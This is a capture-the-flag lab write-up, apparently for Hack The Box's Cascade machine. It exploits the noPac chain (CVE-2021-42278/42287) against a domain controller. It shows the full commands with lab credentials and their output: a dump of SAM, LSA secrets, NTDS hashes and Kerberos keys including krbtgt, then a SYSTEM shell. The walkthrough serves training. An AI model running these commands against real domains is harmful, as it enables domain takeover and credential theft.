CVE-2021-42278/CVE-2021-42287
The target system might be vulnerable to the CVE-2021-42278 +CVE-2021-42287 chain attack given the fact it is relatively older and doesn’t seem to have patch installed for it
By default, any domain user has the SeMachineAccountPrivilege privilege enabled Additionally, users with the privilege can add up to 10 devices to the domain. This can be checked both locally and remotely
*evil-winrm* ps c:\> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota
distinguishedname : DC=cascade,DC=local
ms-ds-machineaccountquota : 10
name : cascade
objectclass : domainDNS
objectguid : 6fd34304-e0ba-4b48-92be-88e4c5926638Notice the ms-DS-MachineAccountQuota attribute set to 10
┌──(kali㉿kali)-[~/…/htb/labs/resolute/nopac]
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ ldapsearch -x -h ldap://cascade.local:389 -D 'r.thompson@cascade.local' -w 'rY4n5eva' -b 'DC=CASCADE,DC=LOCAL' -LLL | grep -w ms-DS-MachineAccountQuota
ms-ds-machineaccountquota: 10Through ldapsearch, it can also be checked remotely
exploit (nopac)
The CVE-2021-42278 + CVE-2021-42287 chain attack (noPac) works by impersonating a domain controller through faking a computer account with the trailing $ sign
Testing
┌──(kali㉿kali)-[~/…/htb/labs/cascade/noPac]
└─$ cme smb $IP -d cascade.LOCAL --kdcHost casc-dc1.cascade.local -u 'r.thompson' -p 'rY4n5eva' -M nopac
smb 10.10.10.182 445 casc-dc1 [*] windows 6.1 build 7601 x64 (name:CASC-DC1) (domain:cascade.LOCAL) (signing:True) (SMBv1:False)
smb 10.10.10.182 445 casc-dc1 [+] cascade.local\r.thompson:rY4n5eva
NOPAC 10.10.10.182 445 CASC-DC1 TGT with PAC size 1487
NOPAC 10.10.10.182 445 CASC-DC1 TGT without PAC size 722
NOPAC 10.10.10.182 445 CASC-DC1
NOPAC 10.10.10.182 445 CASC-DC1 VULNEABLE
nopac 10.10.10.182 445 casc-dc1 next step: https://github.com/Ridter/noPaccrackmapexec has a module available to test for the nopac exploit above As the result shown above, the target system is confirmed to be vulnerable
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/cascade/noPac]
└─$ python3 noPac.py 'cascade.local/r.thompson:rY4n5eva' --impersonate administrator -dc-ip $IP -use-ldap -dump
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target casc-dc1.cascade.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-URI1NQCG4LR$"
[*] MachineAccount "WIN-URI1NQCG4LR$" password = nUK7VMiOt!2n
[*] Successfully added machine account WIN-URI1NQCG4LR$ with password nUK7VMiOt!2n.
[*] WIN-URI1NQCG4LR$ object = CN=WIN-URI1NQCG4LR,CN=Computers,DC=cascade,DC=local
[*] WIN-URI1NQCG4LR$ sAMAccountName == casc-dc1
[*] Saving a DC's ticket in casc-dc1.ccache
[*] Reseting the machine account to WIN-URI1NQCG4LR$
[*] Restored WIN-URI1NQCG4LR$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_casc-dc1.cascade.local.ccache
[*] Attempting to del a computer with the name: WIN-URI1NQCG4LR$
[-] Delete computer WIN-URI1NQCG4LR$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Target system bootKey: 0x3c67174689c6b5a53b5e3227e338e2ad
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d256a4c6553e66da3c7872179eeb7d26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CASCADE\CASC-DC1$:plain_password_hex:32ffeb930389f1da76e0889a8e25c403815af5ee7f4e63f325324aec1b8d0c82506127608e4c8fc7454d304979325cfd6f07e9cc0fdb61e371f45104dc21df5b677d8828e5db5841462244d89de1a630dc1b649e7915ea22cf92aa4be158a3a049393491dad45f3f02f77db554bc649e8828126b399e35a6a75d2aaa4b8816fa421fc54648398cf3c146cb4667f53c34820a080f09e6aa4856e978d8fd9ea4a39c94892ef1cac5e5b7c58c7488b12c13a0f25de80988c2050065975076f851d2e6ba67df898ad00496c93af0e7caa7fcb91dc7ddb5b23a4312f59942536af24c727b5a6067e612782e26e12e3b1a9beb
CASCADE\CASC-DC1$:aad3b435b51404eeaad3b435b51404ee:9f66aa0e27a87e63718eab2262d95409:::
[*] DefaultPassword
CASCADE\vbscrub:mario128
[*] DPAPI_SYSTEM
dpapi_machinekey:0xfde585c8ff6d34a3e4677fd263b5acc5ce275c7c
dpapi_userkey:0x31742d7265952f5e193ace0bb04758eaf0414edb
[*] NL$KM
0000 86 51 61 06 1D D3 36 7D 2D 50 2D AB 02 B9 E2 8E .Qa...6}-P-.....
0010 DD 3F 75 C5 DE 35 8F E4 B7 D5 E6 39 5C D4 D2 DF .?u..5.....9\...
0020 D7 AA A2 D3 C3 18 8B 56 E3 1F 3F 77 8E 8F E0 38 .......V..?w...8
0030 B9 B6 3E 5F 6C 09 F3 37 E8 64 FD E1 6E 01 D6 2A ..>_l..7.d..n..*
NL$KM:865161061dd3367d2d502dab02b9e28edd3f75c5de358fe4b7d5e6395cd4d2dfd7aaa2d3c3188b56e31f3f778e8fe038b9b63e5f6c09f337e864fde16e01d62a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
cascade.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:7c2ea40b06d267f1557a09ac086b4487:::
cascade.local\CascGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3a1b37192392d74e86d04242288dc147:::
cascade.local\arksvc:1106:aad3b435b51404eeaad3b435b51404ee:10ffc991edaa4635cf81eb91762420cb:::
cascade.local\s.smith:1107:aad3b435b51404eeaad3b435b51404ee:b48b49789458698abadc119c8e310703:::
cascade.local\r.thompson:1109:aad3b435b51404eeaad3b435b51404ee:63251f7b1bada5082e5ffb18261ba28f:::
cascade.local\util:1111:aad3b435b51404eeaad3b435b51404ee:49a914ea7201025aeff21cd858ec7d66:::
cascade.local\j.wakefield:1116:aad3b435b51404eeaad3b435b51404ee:13ae5d7704258917054d662d016eab60:::
cascade.local\s.hickson:1121:aad3b435b51404eeaad3b435b51404ee:2776416ceb426c515cab11bb8411067b:::
cascade.local\j.goodhand:1122:aad3b435b51404eeaad3b435b51404ee:1d6eb7e45708504e0a9646b7aea9fc9b:::
cascade.local\a.turnbull:1124:aad3b435b51404eeaad3b435b51404ee:1d6eb7e45708504e0a9646b7aea9fc9b:::
cascade.local\e.crowe:1127:aad3b435b51404eeaad3b435b51404ee:95d4f729c16ae37b910317d665ba2215:::
cascade.local\b.hanson:1128:aad3b435b51404eeaad3b435b51404ee:5da61ebae419b915627f25f101fe6b1b:::
cascade.local\d.burman:1129:aad3b435b51404eeaad3b435b51404ee:5da61ebae419b915627f25f101fe6b1b:::
cascade.local\BackupSvc:1130:aad3b435b51404eeaad3b435b51404ee:c27e154566c4788326fce339f4b55491:::
cascade.local\j.allen:1134:aad3b435b51404eeaad3b435b51404ee:64928a685f9a995045f8c04bbf86881d:::
cascade.local\i.croft:1135:aad3b435b51404eeaad3b435b51404ee:431682a8242a237e805badacab95b0e4:::
CASC-DC1$:1001:aad3b435b51404eeaad3b435b51404ee:9f66aa0e27a87e63718eab2262d95409:::
WIN-URI1NQCG4LR$:1139:aad3b435b51404eeaad3b435b51404ee:b8f1c58f7db521fb881dca80c2e1e7a4:::
[*] Kerberos keys grabbed
cascade.local\administrator:aes256-cts-hmac-sha1-96:201b2d849679d315b51959d1acd879032e1f6dba6fa9feb772a2d985edc2c2cf
cascade.local\administrator:aes128-cts-hmac-sha1-96:5ebdd49d14c5b62141ab0e6a2780ef70
cascade.local\administrator:des-cbc-md5:1532f8259b2c4f45
krbtgt:aes256-cts-hmac-sha1-96:25deaf37ed42e5cd95b76850d9d76fa663fcce3a9512f31357f5e45d333ca5ea
krbtgt:aes128-cts-hmac-sha1-96:22f5ccb8e68382406cb6e3c24c706208
krbtgt:des-cbc-md5:fba77f5b31239d9e
cascade.local\arksvc:aes256-cts-hmac-sha1-96:3717cd1cd9e13ac692bd99e0de0bbdd7910296f8d1f465cb559f76eb63f21bcc
cascade.local\arksvc:aes128-cts-hmac-sha1-96:0e34dc2f704261583d5f0bfbdf4cac14
cascade.local\arksvc:des-cbc-md5:73f2c423982534a8
cascade.local\s.smith:aes256-cts-hmac-sha1-96:c5b64b93302ccfb91648acea44a708797371bcec306a74a42d614365329635ce
cascade.local\s.smith:aes128-cts-hmac-sha1-96:4cc2dc914d7d971f3708dba510b1a1e9
cascade.local\s.smith:des-cbc-md5:6be0fdeab6cec762
cascade.local\r.thompson:aes256-cts-hmac-sha1-96:d5bf934e36dbbb73b35345f08117b844874b343c9149095ff86034172272259e
cascade.local\r.thompson:aes128-cts-hmac-sha1-96:def0284f32bcaa0291184f0e6b2a8af0
cascade.local\r.thompson:des-cbc-md5:89e3da3dc74576d9
cascade.local\util:aes256-cts-hmac-sha1-96:9e74ea4fa951ebe411bb9d734c48202fd346a21e414bc61c49ff14b41ba14bb5
cascade.local\util:aes128-cts-hmac-sha1-96:cadfed05f20d4ca27ffa30b30664dbae
cascade.local\util:des-cbc-md5:c4a8765b4f3db901
cascade.local\j.wakefield:aes256-cts-hmac-sha1-96:c3a6a1518a513ef2344859b204692d92adea4c78a6b8539e1743cfcbeb85dc5c
cascade.local\j.wakefield:aes128-cts-hmac-sha1-96:134734b88534d38ce5bd786bac268f07
cascade.local\j.wakefield:des-cbc-md5:a876678997570e6d
cascade.local\s.hickson:aes256-cts-hmac-sha1-96:ebdd5dd6e9d0dfac16983b005db8e84b482250740bc3e64b0e58ae30f7e7a7b5
cascade.local\s.hickson:aes128-cts-hmac-sha1-96:83b64186d9c5d8e74b44d6efa3b19ed7
cascade.local\s.hickson:des-cbc-md5:ce8c2f9dfe3b3ddf
cascade.local\j.goodhand:aes256-cts-hmac-sha1-96:770b3bd99ce9b17bbf3e35a839615eb1204cbae05990db83e9393a2564c2f8ed
cascade.local\j.goodhand:aes128-cts-hmac-sha1-96:11ccc9eea5401915a46406441e50ed8f
cascade.local\j.goodhand:des-cbc-md5:fb9226a16d94ba64
cascade.local\a.turnbull:aes256-cts-hmac-sha1-96:4adfe6a4be270895c5a55e440e2a14d70db45f4729d82caff0c157140729f3f1
cascade.local\a.turnbull:aes128-cts-hmac-sha1-96:89c3c86c69648eea1e589db7316710ae
cascade.local\a.turnbull:des-cbc-md5:2c076e23493ef7ba
cascade.local\e.crowe:aes256-cts-hmac-sha1-96:c6459e3f1647f02bd9528bca926beb8bfc944b42f3b12d9777fbdc59431fdc43
cascade.local\e.crowe:aes128-cts-hmac-sha1-96:6d36444d8f1b1a4bda6d7c4118ed61d9
cascade.local\e.crowe:des-cbc-md5:f445588fae23a729
cascade.local\b.hanson:aes256-cts-hmac-sha1-96:a6071c3a20a3ce2e373e8586ef7bd12cb665eb6ee66d110df57ee9f703b528f0
cascade.local\b.hanson:aes128-cts-hmac-sha1-96:34f9f21922871be23e9bedc3fc1741cd
cascade.local\b.hanson:des-cbc-md5:57ef54d568d03e86
cascade.local\d.burman:aes256-cts-hmac-sha1-96:b6a2a64a272ba6c7d2cf638b8614a370d597bc167222555ec655facca6ebfe08
cascade.local\d.burman:aes128-cts-hmac-sha1-96:310087249254f69e0436b2113f08909e
cascade.local\d.burman:des-cbc-md5:83313268372502c2
cascade.local\BackupSvc:aes256-cts-hmac-sha1-96:ffba7ff6b18eba90d46d787e56a0a0ebba7c8d933f992f2b896e5c7ec7da8720
cascade.local\BackupSvc:aes128-cts-hmac-sha1-96:854bd600cad9e7cd309eb124039b25a7
cascade.local\BackupSvc:des-cbc-md5:9ea4d0da8cdcbcef
cascade.local\j.allen:aes256-cts-hmac-sha1-96:56a9256363211ec2ac9ac5d64ddc931b10123bdf4ce4a90c4eee14aab91e401a
cascade.local\j.allen:aes128-cts-hmac-sha1-96:7f03f34bc8c2919a6b6ddd22c983d23c
cascade.local\j.allen:des-cbc-md5:a1b0c14f0ec715a8
cascade.local\i.croft:aes256-cts-hmac-sha1-96:a26cfa25eeb98248137d57f00a509aca41a091218b5a9971ca6af7cd0552c469
cascade.local\i.croft:aes128-cts-hmac-sha1-96:ac531c4553b8f5c2f62614d91e9864e5
cascade.local\i.croft:des-cbc-md5:b6f89862bf854cf1
CASC-DC1$:aes256-cts-hmac-sha1-96:b29f48c3586d2380f247ee5bdc90d969971ed5dffd3317d4abd7014a23c5ef3c
CASC-DC1$:aes128-cts-hmac-sha1-96:b01719fb1be40c2c190d3921703d6afa
CASC-DC1$:des-cbc-md5:a79de5076807ef32
WIN-URI1NQCG4LR$:aes256-cts-hmac-sha1-96:842150748e13cc86913cd4b30b3beff1ad4a301fe94093e632724dfd83ace93b
WIN-URI1NQCG4LR$:aes128-cts-hmac-sha1-96:9c879d89983d2c1c9c69727f1583c539
WIN-URI1NQCG4LR$:des-cbc-md5:e9b0529407ef3efe
[*] Cleaning up... Domain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/…/htb/labs/cascade/noPac]
└─$ python3 nopac.py 'cascade.local/r.thompson:rY4n5eva' --impersonate administrator -dc-ip $IP -use-ldap -shell
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target casc-dc1.cascade.local
[*] will try to impersonate administrator
[*] Already have user administrator ticket for target casc-dc1.cascade.local
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
CASC-DC1
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter local area connection 4:
connection-specific dns suffix . :
ipv6 address. . . . . . . . . . . : dead:beef::4d53:4914:fd45:3fdd
link-local ipv6 address . . . . . : fe80::4d53:4914:fd45:3fdd%15
ipv4 address. . . . . . . . . . . : 10.10.10.182
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%15
10.10.10.2
tunnel adapter isatap.{603b363a-a965-4463-a4d0-a8850f844e1e}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : System Level Compromise